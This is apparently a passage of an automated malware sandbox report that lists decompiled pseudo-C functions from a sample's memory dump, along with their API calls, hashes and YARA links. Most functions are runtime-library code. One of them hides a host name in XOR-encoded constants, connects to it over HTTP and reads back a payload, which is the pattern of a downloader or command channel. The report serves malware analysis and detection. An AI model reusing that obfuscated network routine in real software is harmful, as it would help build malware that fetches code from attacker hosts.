									_t194 = _t202;
								}
								__eflags = _t172 - _t194;
								if(_t172 == _t194) {
									goto L61;
								}
								_t195 = _v16;
								 *_t181 = 0;
								 *_t195 =  *_t195 | 0xffffffff;
								_t172 = _t172 + 1;
								_t181 = _t181 + 1;
								_v16 =  &(_t195[1]);
							}
						}
						L61:
						 *( *( *_t156)) = _t125;
						_t87 =  &_v32; // 0xea6120
						_t158 = 1;
						__eflags = 1;
						 *( *( *(_t156 + 4))) =  *_t87;
					} else {
						_t130 = E00E95BBD();
						_t158 = 0;
						 *_t130 = 0xc;
					}
					E00E964B8(0);
					_t128 = _t158;
				} else {
					 *((intOrPtr*)(E00E95BBD())) = 0xc;
					_t128 = 0;
				}
				return _t128;
			}

0x00e96745
0x00e96747
0x00e9674c
0x00000000
0x00e96757
0x00e9675f
0x00e96763
0x00000000
0x00000000
0x00e96765
0x00e96769
0x00e96770
0x00000000
0x00e96770
0x00e96775
0x00e96780
0x00e96787
0x00e9678d
0x00e96792
0x00e96798
0x00e9679a
0x00e9679f
0x00e967a7
0x00e967aa
0x00e967f6
0x00e967f6
0x00e9693c
0x00000000
0x00e9693d
0x00e967b3
0x00e967b7
0x00e967c9
0x00e967d1
0x00e967d3
0x00e967d8
0x00e967e0
0x00e967e3
0x00e967eb
0x00e967ee
0x00000000
0x00e967f3
0x00e967fd
0x00e96804
0x00e96806
0x00e96808
0x00e96808
0x00e96809
0x00e96810
0x00e96815
0x00e9681a
0x00e96823
0x00e9682a
0x00e96834
0x00e96849
0x00e9684e
0x00e96854
0x00e96857
0x00e96859
0x00e968a5
0x00e968ac
0x00e968b2
0x00e968b4
0x00e968b7
0x00e968b7
0x00e968bd
0x00e968bf
0x00e968c2
0x00e968c2
0x00e968e7
0x00e968ea
0x00e968f2
0x00e968f6
0x00e968fe
0x00e96902
0x00e96907
0x00e96938
0x00000000
0x00e9693b
0x00e9685b
0x00e9685e
0x00e96861
0x00e96867
0x00e96869
0x00e968ca
0x00e968cd
0x00e9690b
0x00e9690d
0x00e96910
0x00e96910
0x00e96919
0x00e96921
0x00e96925
0x00e9692d
0x00e9692d
0x00e9692d
0x00e96931
0x00e96936
0x00000000
0x00e96936
0x00e968cf
0x00e968d1
0x00e968d4
0x00e968d4
0x00e968da
0x00e968dc
0x00e968df
0x00e968df
0x00e968e5
0x00e968e5
0x00000000
0x00e968e5
0x00e9686d
0x00e9687a
0x00e96880
0x00e96882
0x00000000
0x00000000
0x00e96887
0x00e9688a
0x00e9688c
0x00e9688f
0x00e9688f
0x00e96895
0x00e96897
0x00e9689a
0x00e9689a
0x00e968a0
0x00000000
0x00e968a0
0x00e96944
0x00e96949
0x00e96952
0x00e96953
0x00e96955
0x00e96956
0x00e96957
0x00e9695e
0x00e96966
0x00e96969
0x00e9696f
0x00e96971
0x00e96973
0x00e96973
0x00e96976
0x00e96980
0x00e96983
0x00e9698a
0x00e9698f
0x00000000
0x00000000
0x00e96991
0x00e96992
0x00e96992
0x00e96995
0x00000000
0x00000000
0x00000000
0x00e96995
0x00e96976
0x00e96997
0x00e96997
0x00e9699d
0x00e969bd
0x00e969c0
0x00e969c5
0x00e969ca
0x00e969cc
0x00e969e0
0x00e969e0
0x00e969e3
0x00e969e5
0x00e969e8
0x00e969eb
0x00e969ed
0x00e969f0
0x00e969f3
0x00e969f5
0x00e969f7
0x00e969f9
0x00e969fb
0x00e96a08
0x00e96a0f
0x00e96a12
0x00e96a15
0x00e96a1f
0x00e96a23
0x00e96a23
0x00e96a17
0x00e96a17
0x00e96a1a
0x00e96a1a
0x00e96a26
0x00e96a28
0x00e96a29
0x00e96a2c
0x00e96a2c
0x00e96a30
0x00e96a33
0x00e96a36
0x00e96a36
0x00e96a3c
0x00e96a3f
0x00e96a41
0x00e96a41
0x00e96a43
0x00e96a43
0x00e96a46
0x00e96a4e
0x00e96a48
0x00e96a48
0x00e96a48
0x00e96a4f
0x00e96a51
0x00000000
0x00000000
0x00e96a53
0x00e96a56
0x00e96a59
0x00e96a5c
0x00e96a5d
0x00e96a61
0x00e96a61
0x00e96a43
0x00e96a66
0x00e96a6a
0x00e96a71
0x00e96a74
0x00e96a74
0x00e96a77
0x00e969ce
0x00e969ce
0x00e969d3
0x00e969d5
0x00e969d5
0x00e96a7b
0x00e96a81
0x00e9699f
0x00e969a4
0x00e969aa
0x00e969aa
0x00e96a89

APIs

Part of subcall function 00EA1217: _free.LIBCMT ref: 00EA1239

_free.LIBCMT ref: 00E967AA
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E9686D
GetExitCodeProcess.KERNEL32 ref: 00E9687A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E9688F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E9689A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E968A5
__dosmaperr.LIBCMT ref: 00E968AC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E968B7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E968C2
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E968D4
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E968DF
_free.LIBCMT ref: 00E9679F

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

_free.LIBCMT ref: 00E967D8
_free.LIBCMT ref: 00E967E3
_free.LIBCMT ref: 00E967EE
_free.LIBCMT ref: 00E968EA
_free.LIBCMT ref: 00E968F6
_free.LIBCMT ref: 00E96902
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E96910
_free.LIBCMT ref: 00E96919
_free.LIBCMT ref: 00E96925
_free.LIBCMT ref: 00E96931

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
String ID:
API String ID: 3529756214-0
Opcode ID: f6af65f7a2f5731676c4a01015f23a6e26221c1ce761a6eac88fb3ee654f0f5b
Instruction ID: 207aa33850c01bd7117644689d3797c9163b5a66d03d6f74be233d97ba2a2c48
Opcode Fuzzy Hash: f6af65f7a2f5731676c4a01015f23a6e26221c1ce761a6eac88fb3ee654f0f5b
Instruction Fuzzy Hash: 67516C72900208BFDF22AFA0CC85AEEBBB9EF45319F105067F911B6150D7355E84DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E95707, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 343
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00E95707(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr* _v48;
				char* _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				char _v92;
				signed int _t118;
				char _t140;
				signed short _t143;
				signed int _t144;
				void* _t147;
				void* _t150;
				void* _t153;
				void* _t154;
				void* _t157;
				signed int _t159;
				intOrPtr* _t160;
				signed char _t177;
				signed int* _t180;
				char* _t183;
				signed char _t184;
				void* _t191;
				char _t193;
				void* _t195;
				signed int* _t197;
				intOrPtr _t198;
				intOrPtr _t202;
				short* _t206;
				intOrPtr _t207;
				signed int _t208;
				signed char _t215;
				char _t216;
				intOrPtr _t217;
				void* _t220;
				signed int _t221;
				signed char* _t223;
				int* _t225;
				signed char* _t237;
				short* _t238;
				intOrPtr* _t240;
				char* _t241;
				char* _t242;
				intOrPtr* _t246;
				signed int _t247;
				short* _t248;
				void* _t250;
				signed int _t251;
				signed int _t252;
				void* _t253;
				void* _t254;

				_t118 =  *0xea9014; // 0xa413846
				_v8 = _t118 ^ _t252;
				_t240 = _a4;
				_t193 = 0;
				_v56 = _t240;
				_v32 = 0;
				_v36 = 0;
				_t120 =  *((intOrPtr*)(_t240 + 0xa8));
				_v40 = 0;
				_v44 = 0;
				_v92 = _t240;
				_v88 = 0;
				if( *((intOrPtr*)(_t240 + 0xa8)) == 0) {
					__eflags =  *((intOrPtr*)(_t240 + 0x8c));
					if( *((intOrPtr*)(_t240 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t240 + 0x8c)) = _t193;
					__eflags = 0;
					 *((intOrPtr*)(_t240 + 0x90)) = _t193;
					 *_t240 = 0xe74fd8;
					 *((intOrPtr*)(_t240 + 0x94)) = 0xe75258;
					 *((intOrPtr*)(_t240 + 0x98)) = 0xe753d8;
					 *((intOrPtr*)(_t240 + 4)) = 1;
					L48:
					return E00E8AE43(_v8 ^ _t252);
				}
				_push(__edi);
				_t225 = _t240 + 8;
				_v48 = 0;
				if( *_t225 != 0) {
					L3:
					_v48 = E00E998AF(1, 4);
					E00E964B8(_t193);
					_v32 = E00E998AF(0x180, 2);
					E00E964B8(_t193);
					_v36 = E00E998AF(0x180, 1);
					E00E964B8(_t193);
					_v40 = E00E998AF(0x180, 1);
					E00E964B8(_t193);
					_v44 = E00E998AF(0x101, 1);
					E00E964B8(_t193);
					_t254 = _t253 + 0x3c;
					if(_v48 == _t193 || _v32 == _t193) {
						L43:
						E00E964B8(_v48);
						E00E964B8(_v32);
						E00E964B8(_v36);
						E00E964B8(_v40);
						_t193 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t202 = _v44;
						if(_t202 == 0 || _v36 == _t193 || _v40 == _t193) {
							goto L43;
						} else {
							_t140 = _t193;
							do {
								 *((char*)(_t140 + _t202)) = _t140;
								_t140 = _t140 + 1;
							} while (_t140 < 0x100);
							if(GetCPInfo( *_t225,  &_v28) == 0) {
								goto L43;
							}
							_t143 = _v28;
							if(_t143 > 5) {
								goto L43;
							}
							_t144 = _t143 & 0x0000ffff;
							_v60 = _t144;
							if(_t144 <= 1) {
								L22:
								_v52 = _v44 + 1;
								_t147 = E00E99335(_t193, _t225, _t240, _t272, _t193,  *((intOrPtr*)(_t240 + 0xa8)), 0x100, _v44 + 1, 0xff, _v36 + 0x81, 0xff,  *_t225, _t193);
								_t254 = _t254 + 0x24;
								_t273 = _t147;
								if(_t147 == 0) {
									goto L43;
								}
								_t150 = E00E99335(_t193, _t225, _t240, _t273, _t193,  *((intOrPtr*)(_t240 + 0xa8)), 0x200, _v52, 0xff, _v40 + 0x81, 0xff,  *_t225, _t193);
								_t254 = _t254 + 0x24;
								_t274 = _t150;
								if(_t150 == 0) {
									goto L43;
								}
								_v76 = _v32 + 0x100;
								_t153 = E00E9BFC9(_t193, _t225, _t240, _t274, _t193, 1, _v44, 0x100, _v32 + 0x100,  *_t225, _t193);
								_t254 = _t254 + 0x1c;
								if(_t153 == 0) {
									goto L43;
								}
								_t154 = _v32;
								_t206 = _t154 + 0xfe;
								 *_t206 = 0;
								_t220 = _v40;
								_v80 = _t206;
								_t207 = _v36;
								_t241 = _t207 + 0x80;
								 *((char*)(_t207 + 0x7f)) = _t193;
								 *((char*)(_t220 + 0x7f)) = _t193;
								 *_t241 = _t193;
								_v84 = _t241;
								_t242 = _t220 + 0x80;
								_v52 = _t242;
								 *_t242 = _t193;
								if(_v60 <= 1) {
									L39:
									_t208 = 0x3f;
									_push(0x1f);
									_t157 = memcpy(_v32, _v32 + 0x200, _t208 << 2);
									_push(0x1f);
									asm("movsw");
									memcpy(_t157, _t157 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t159 = memcpy(_t220, _t220 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t246 = _v56;
									if( *((intOrPtr*)(_t246 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t159 | 0xffffffff) == 0) {
											E00E964B8( *((intOrPtr*)(_t246 + 0x90)) - 0xfe);
											E00E964B8( *((intOrPtr*)(_t246 + 0x94)) - 0x80);
											E00E964B8( *((intOrPtr*)(_t246 + 0x98)) - 0x80);
											E00E964B8( *((intOrPtr*)(_t246 + 0x8c)));
										}
									}
									_t160 = _v48;
									 *_t160 = 1;
									 *((intOrPtr*)(_t246 + 0x8c)) = _t160;
									 *_t246 = _v76;
									 *((intOrPtr*)(_t246 + 0x90)) = _v80;
									 *((intOrPtr*)(_t246 + 0x94)) = _v84;
									 *((intOrPtr*)(_t246 + 0x98)) = _v52;
									 *(_t246 + 4) = _v60;
									L44:
									E00E964B8(_v44);
									goto L48;
								}
								if( *_t225 != 0xfde9) {
									_t237 =  &_v22;
									__eflags = _v22 - _t193;
									if(_v22 == _t193) {
										goto L39;
									}
									_t195 = _v32;
									while(1) {
										_t177 = _t237[1];
										__eflags = _t177;
										if(_t177 == 0) {
											break;
										}
										_t247 =  *_t237 & 0x000000ff;
										_v68 = _t247;
										__eflags = _t247 - (_t177 & 0x000000ff);
										if(_t247 > (_t177 & 0x000000ff)) {
											L37:
											_t237 =  &(_t237[2]);
											__eflags =  *_t237;
											if( *_t237 != 0) {
												continue;
											}
											break;
										}
										_v64 = _t207;
										_t180 = _t220 + 0x80 + _t247;
										_t215 = _t207 - _t220;
										__eflags = _t215;
										_t221 = _v68;
										_t248 = _t195 - 0xffffff00 + _t247 * 2;
										_v72 = _t180;
										_t197 = _t180;
										do {
											 *_t248 = 0x8000;
											_t248 = _t248 + 2;
											 *(_t197 + _t215) = _t221;
											 *_t197 = _t221;
											_t221 = _t221 + 1;
											_t197 =  &(_t197[0]);
											__eflags = _t221 - (_t237[1] & 0x000000ff);
										} while (_t221 <= (_t237[1] & 0x000000ff));
										_t220 = _v40;
										_t207 = _v36;
										_t195 = _v32;
										goto L37;
									}
									L38:
									_t193 = 0;
									goto L39;
								}
								_t198 = _v52;
								_t238 = _t154 + 0x284;
								_t216 = 0xc2;
								_t250 = _t207 - _t220;
								do {
									_t183 = _t198 + _t216;
									 *_t238 = 0x8000;
									 *((char*)(_t250 + _t183)) = _t216;
									_t238 = _t238 + 2;
									 *_t183 = _t216;
									_t216 = _t216 + 1;
								} while (_t216 < 0xf5);
								_t220 = _v40;
								goto L38;
							}
							_t272 =  *_t225 - 0xfde9;
							if( *_t225 != 0xfde9) {
								_t223 =  &_v22;
								__eflags = _v22 - _t193;
								if(__eflags == 0) {
									goto L22;
								}
								_t217 = _v44;
								while(1) {
									_t184 = _t223[1];
									__eflags = _t184;
									if(__eflags == 0) {
										break;
									}
									_t251 =  *_t223 & 0x000000ff;
									__eflags = _t251 - (_t184 & 0x000000ff);
									if(_t251 > (_t184 & 0x000000ff)) {
										L20:
										_t223 =  &(_t223[2]);
										__eflags =  *_t223 - _t193;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t251 + _t217)) = 0x20;
										_t251 = _t251 + 1;
										__eflags = _t251 - (_t223[1] & 0x000000ff);
									} while (_t251 <= (_t223[1] & 0x000000ff));
									goto L20;
								}
								_t240 = _v56;
								goto L22;
							}
							E00E8D0F0(_t225, _v44 - 0xffffff80, 0x20, 0x80);
							_t254 = _t254 + 0xc;
							goto L22;
						}
					}
				}
				_t191 = E00E9EDC5(0, _t225, _t240,  &_v92, 0, _t120, 0x1004, _t225);
				_t254 = _t253 + 0x14;
				if(_t191 != 0) {
					goto L43;
				}
				goto L3;
			}

0x00e9570f
0x00e95716
0x00e9571b
0x00e9571e
0x00e95720
0x00e95723
0x00e95726
0x00e95729
0x00e9572f
0x00e95732
0x00e95735
0x00e95738
0x00e9573d
0x00e95afe
0x00e95b00
0x00e95b02
0x00e95b02
0x00e95b05
0x00e95b0b
0x00e95b0d
0x00e95b13
0x00e95b19
0x00e95b23
0x00e95b2d
0x00e95b34
0x00e95b43
0x00e95b43
0x00e95743
0x00e95744
0x00e95747
0x00e9574c
0x00e9576a
0x00e95774
0x00e95777
0x00e95789
0x00e9578c
0x00e9579e
0x00e957a1
0x00e957b3
0x00e957b6
0x00e957c8
0x00e957cb
0x00e957d0
0x00e957d6
0x00e95ac4
0x00e95ac7
0x00e95acf
0x00e95ad7
0x00e95adf
0x00e95ae9
0x00e95ae9
0x00000000
0x00e957e5
0x00e957e5
0x00e957ea
0x00000000
0x00e95802
0x00e95802
0x00e95804
0x00e95804
0x00e95807
0x00e95808
0x00e9581d
0x00000000
0x00000000
0x00e95823
0x00e95829
0x00000000
0x00000000
0x00e9582f
0x00e95832
0x00e95838
0x00e9588d
0x00e958b0
0x00e958b4
0x00e958b9
0x00e958bc
0x00e958be
0x00000000
0x00000000
0x00e958e6
0x00e958eb
0x00e958ee
0x00e958f0
0x00000000
0x00000000
0x00e9590a
0x00e95910
0x00e95915
0x00e9591a
0x00000000
0x00000000
0x00e95920
0x00e95929
0x00e9592f
0x00e95932
0x00e95935
0x00e95938
0x00e9593b
0x00e95941
0x00e95944
0x00e95947
0x00e95949
0x00e9594c
0x00e95952
0x00e95955
0x00e95957
0x00e95a02
0x00e95a09
0x00e95a0a
0x00e95a15
0x00e95a18
0x00e95a1a
0x00e95a24
0x00e95a27
0x00e95a29
0x00e95a32
0x00e95a34
0x00e95a36
0x00e95a37
0x00e95a42
0x00e95a47
0x00e95a4b
0x00e95a59
0x00e95a6c
0x00e95a7a
0x00e95a85
0x00e95a8a
0x00e95a4b
0x00e95a8d
0x00e95a90
0x00e95a96
0x00e95a9f
0x00e95aa4
0x00e95aad
0x00e95ab6
0x00e95abf
0x00e95aea
0x00e95aed
0x00000000
0x00e95af5
0x00e95963
0x00e95998
0x00e9599b
0x00e9599e
0x00000000
0x00000000
0x00e959a0
0x00e959a3
0x00e959a3
0x00e959a6
0x00e959a8
0x00000000
0x00000000
0x00e959aa
0x00e959b0
0x00e959b3
0x00e959b5
0x00e959f8
0x00e959f8
0x00e959fb
0x00e959fe
0x00000000
0x00000000
0x00000000
0x00e959fe
0x00e959bd
0x00e959c6
0x00e959c8
0x00e959c8
0x00e959ca
0x00e959cd
0x00e959d0
0x00e959d3
0x00e959d5
0x00e959da
0x00e959dd
0x00e959e0
0x00e959e3
0x00e959e5
0x00e959ea
0x00e959eb
0x00e959eb
0x00e959ef
0x00e959f2
0x00e959f5
0x00000000
0x00e959f5
0x00e95a00
0x00e95a00
0x00000000
0x00e95a00
0x00e95965
0x00e95968
0x00e95970
0x00e95975
0x00e9597c
0x00e9597c
0x00e9597f
0x00e95982
0x00e95985
0x00e95988
0x00e9598a
0x00e9598b
0x00e95993
0x00000000
0x00e95993
0x00e9583a
0x00e95840
0x00e9585a
0x00e9585d
0x00e95860
0x00000000
0x00000000
0x00e95862
0x00e95865
0x00e95865
0x00e95868
0x00e9586a
0x00000000
0x00000000
0x00e9586c
0x00e95872
0x00e95874
0x00e95883
0x00e95883
0x00e95886
0x00e95888
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e95876
0x00e95876
0x00e95876
0x00e9587a
0x00e9587f
0x00e9587f
0x00000000
0x00e95876
0x00e9588a
0x00000000
0x00e9588a
0x00e95850
0x00e95855
0x00000000
0x00e95855
0x00e957ea
0x00e957d6
0x00e9575a
0x00e9575f
0x00e95764
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 00E95777
_free.LIBCMT ref: 00E9578C
_free.LIBCMT ref: 00E957A1
_free.LIBCMT ref: 00E957B6
_free.LIBCMT ref: 00E957CB
GetCPInfo.KERNEL32(?,?), ref: 00E95815

Part of subcall function 00E9EDC5: _free.LIBCMT ref: 00E9EE30

_free.LIBCMT ref: 00E95A59
_free.LIBCMT ref: 00E95A6C
_free.LIBCMT ref: 00E95A7A
_free.LIBCMT ref: 00E95A85
_free.LIBCMT ref: 00E95AC7
_free.LIBCMT ref: 00E95ACF
_free.LIBCMT ref: 00E95AD7
_free.LIBCMT ref: 00E95ADF
_free.LIBCMT ref: 00E95AED

Strings

F8A/, xrefs: 00E9570F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID: F8A/
API String ID: 2509303402-73971870
Opcode ID: 74e9205e2ceb2c847f125a091f86c0abaaee57f60d9937cf179a53f869a85384
Instruction ID: b37a2b36226c977971fd6934bf3261e8e4a3198817326089c0f04fa2f23fe31c
Opcode Fuzzy Hash: 74e9205e2ceb2c847f125a091f86c0abaaee57f60d9937cf179a53f869a85384
Instruction Fuzzy Hash: 08D18A729007459FDF21DFB8C881BEEBBF4BF08300F145169E994BB292D6B5A845CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E887BF, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 169
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E887BF(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __ebp) {
				signed int _v4;
				char _v26;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* _v52;
				char _v76;
				char _v80;
				void* _v92;
				char _v113;
				char _v116;
				void* _v120;
				void* _v124;
				long _v140;
				void _v152;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				signed int _t52;
				void* _t61;
				char* _t64;
				intOrPtr _t76;
				intOrPtr _t77;
				signed int _t82;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t91;
				char _t98;
				void* _t101;
				void* _t102;
				intOrPtr* _t104;
				signed int _t107;

				_t52 =  *0xea9014; // 0xa413846
				_v4 = _t52 ^ _t107;
				_t104 = __ecx;
				_t82 = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_t101 = InternetOpenA(0, 0, 0, 0, 0);
				_v52 = _t101;
				if(_t101 != 0) {
					_v40 = 0x21362e22;
					_v36 = 0x693c3c2b;
					_v32 = 0x22262727;
					_v28 = 0x2822;
					_v26 = 0;
					_t61 = InternetConnectA(_t101, E00E827F5( &_v40), 0x50, 0, 0, 3, 0, 0);
					_v92 = _t61;
					if(_t61 != 0) {
						_t96 = 0;
						if( *__ecx == 0) {
							_v116 = 0x160407;
							_t88 = 0;
							do {
								_t15 = _t88 + 0x40; // 0x40
								 *(_t107 + _t88 + 0x10) =  *(_t107 + _t88 + 0x10) ^ _t15;
								_t88 = _t88 + 1;
							} while (_t88 < 3);
							_v113 = 0;
							_t64 =  &_v116;
						} else {
							_v80 = 0x17110e10;
							_v76 = 0;
							_t64 = E00E832BE( &_v80);
							_t96 = 0;
						}
						_t22 = _t104 + 0xc; // 0x0
						_t102 = HttpOpenRequestA(_v92, _t64,  *_t22, _t96, _t96, _t96, 0x84680100, _t96);
						if(_t102 != 0) {
							_t24 = _t104 + 0x14; // 0x0
							_t25 = _t104 + 0x10; // 0x0
							if(HttpSendRequestA(_t102, 0, 0,  *_t25,  *_t24) != 0) {
								_v152 = _v152 & _t82;
								_v140 = 4;
								HttpQueryInfoA(_t102, 0x20000013,  &_v152,  &_v140, 0);
								if(_v172 == 0xc8) {
									_push(0x400a);
									_t83 = E00E909A2();
									_v184 = 0x400a;
									_v180 = 0;
									if(_t83 == 0) {
										_t82 = 0;
									} else {
										_v176 = 1;
										_push( &_v168);
										_push(0x400a);
										_push(_t83);
										while(InternetReadFile(_t102, ??, ??, ??) != 0) {
											_t98 = _v184;
											_t76 = _v196;
											if(_t98 == 0) {
												 *((char*)(_t76 + _t83)) = 0;
												 *((intOrPtr*)(_t104 + 0x18)) = _t83;
												_t82 = _v192;
												 *((intOrPtr*)(_t104 + 0x1c)) = _t76;
											} else {
												_t77 = _t76 + _t98;
												_t91 = _v200 - _t98;
												_v196 = _t77;
												_v200 = _t91;
												if(_t91 != 0) {
													L16:
													_push( &_v184);
													_push(_t91);
													_push(_t77 + _t83);
													continue;
												} else {
													_v200 = 0x400a;
													_push(_t77 + 0x400a);
													_push(_t83);
													_t83 = E00E9294D();
													if(_t83 == 0) {
														break;
													} else {
														_t77 = _v196;
														_t91 = _v200;
														goto L16;
													}
												}
											}
											goto L21;
										}
										_t82 = 0;
									}
								}
							}
							L21:
							InternetCloseHandle(_t102);
						}
						InternetCloseHandle(_v124);
						_t101 = _v120;
					}
					InternetCloseHandle(_t101);
				}
				InternetCloseHandle(_t101);
				return E00E8AE43(_v28 ^ _t107);
			}

0x00e887c2
0x00e887c9
0x00e887d2
0x00e887da
0x00e887dc
0x00e887eb
0x00e887ed
0x00e887f3
0x00e887fb
0x00e8880f
0x00e88817
0x00e8881f
0x00e88826
0x00e88831
0x00e88837
0x00e8883d
0x00e88843
0x00e88847
0x00e88862
0x00e8886a
0x00e8886c
0x00e8886c
0x00e8886f
0x00e88873
0x00e88874
0x00e88879
0x00e8887d
0x00e88849
0x00e8884d
0x00e88855
0x00e88859
0x00e8885e
0x00e8885e
0x00e8888a
0x00e88898
0x00e8889c
0x00e888a2
0x00e888a5
0x00e888b5
0x00e888bb
0x00e888ca
0x00e888d9
0x00e888e7
0x00e888ed
0x00e888f7
0x00e88900
0x00e88904
0x00e8890b
0x00e88988
0x00e8890d
0x00e88911
0x00e88919
0x00e8891a
0x00e8891b
0x00e88969
0x00e8891e
0x00e88922
0x00e88928
0x00e88978
0x00e8897c
0x00e8897f
0x00e88983
0x00e8892a
0x00e8892e
0x00e88930
0x00e88932
0x00e88936
0x00e8893c
0x00e88960
0x00e88966
0x00e88967
0x00e88968
0x00000000
0x00e8893e
0x00e88945
0x00e88949
0x00e8894a
0x00e88950
0x00e88956
0x00000000
0x00e88958
0x00e88958
0x00e8895c
0x00000000
0x00e8895c
0x00e88956
0x00e8893c
0x00000000
0x00e88928
0x00e88974
0x00e88974
0x00e8890b
0x00e888e7
0x00e8898a
0x00e8898b
0x00e8898b
0x00e88991
0x00e88993
0x00e88993
0x00e88998
0x00e88998
0x00e8899b
0x00e889b1

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E887DF
InternetConnectA.WININET(00000000,00000000,?,?,00000050,00000000,00000000,00000003), ref: 00E88831
HttpOpenRequestA.WININET(?,00160407,00000000,00000000,00000000,00000000,84680100,00000000), ref: 00E88892
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E888AD
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00E888D9
InternetReadFile.WININET(00000000,00000000,0000400A,?), ref: 00E8896A
InternetCloseHandle.WININET(00000000), ref: 00E8898B
InternetCloseHandle.WININET(?), ref: 00E88991
InternetCloseHandle.WININET(00000000), ref: 00E88998
InternetCloseHandle.WININET(00000000), ref: 00E8899B

Strings

".6!, xrefs: 00E887FB
F8A/, xrefs: 00E887C2
''&", xrefs: 00E88817
"(, xrefs: 00E8881F
+<<i, xrefs: 00E8880F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Http$OpenRequest$ConnectFileInfoQueryReadSend
String ID: "($".6!$''&"$+<<i$F8A/
API String ID: 379955058-3680369854
Opcode ID: ddc4a1f8b4b885c246722780e75b0dcc45f53d07db0225bcdf9f2d3350ef47a0
Instruction ID: c7c27cfbaca4d18981c58b1a8b2741e5d76897b061e26193a82c4186a18c40e2
Opcode Fuzzy Hash: ddc4a1f8b4b885c246722780e75b0dcc45f53d07db0225bcdf9f2d3350ef47a0
Instruction Fuzzy Hash: 765190B1208301AFE714DF25CD80A3BBBF9EBD9704F54592DF989A6211DB70D9098B63

Uniqueness

Uniqueness Score: -1.00%

Function 00E82966, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 177
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E82966(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				char* _t53;
				char _t56;
				void* _t58;
				long _t60;
				intOrPtr _t65;
				short _t66;
				char _t67;
				void _t68;
				void _t72;
				void _t73;
				void* _t76;
				void* _t77;
				long _t79;
				char* _t88;
				int _t91;
				intOrPtr* _t92;
				signed int _t97;
				void* _t102;
				signed int _t104;
				void* _t112;
				void* _t113;
				signed int _t114;
				short* _t118;
